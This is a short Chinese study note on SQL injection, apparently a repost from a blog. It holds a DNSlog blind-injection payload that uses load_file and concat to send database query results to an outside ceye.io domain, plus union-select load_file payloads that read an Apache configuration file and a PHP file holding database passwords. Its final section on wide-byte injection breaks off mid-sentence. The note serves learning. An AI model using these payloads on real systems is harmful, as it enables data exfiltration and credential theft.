20206月份sql注入学习总结

    技术2022-07-13  67

    Dnslog盲注:

    攻击者首先提交注入语句select load_file(concat(’\\’,‘攻击语句’,.XXX.ceye.io\abc)),concat()把执行结果语句和XXX.ceye.io\abc进行拼接,构成一个新的域名,而mysql中的select load_file()可以发起请求,那么这一条带有数据库查询结果的域名就被提交到DNS服务器进行解析,DNS服务器上的Dnslog就可以得到SQL注入结果,注入语句中的ceye.io,是一个开放的Dnslog平台,我们可以从平台获取到有关ceye.io的DNS查询信息

    总结: Dnslog盲注就是利用load-file()函数发起请求,使用Dnslog接受请求,获取数据的一种攻击方法

    核心语法: select load_file(concat(’\\’,(select database()),’.XXX.ceye.io\abc’) 通过对 “selecct databse()” 这一部分语句的构造,就能实现有回显的SQL注入。

    转载:https://www.jianshu.com/p/d6788f57dba5

    load_file()介绍

    读/etc/init.d下的东西,这里有配置文件路径

    ?id=1' union select 1,2,load_file('/etc/init.d/httpd')

    得到web安装路径

    ?id=1' union select 1,2,load_file('/etc/apache/conf/httpd.conf')

    读取密码文件

    ?id=1' union select 1,2,load_file('var/www/html/xxx.com/php/conn.inc.php')

    转载:https://www.jianshu.com/p/4de3e2677601

    宽字节注入:

    利用编码问题,进行攻击的一种方式,注入语句中的

    转载请注明原文地址:https://ipadbbs.8miu.com/read-23981.html
    最新回复(0)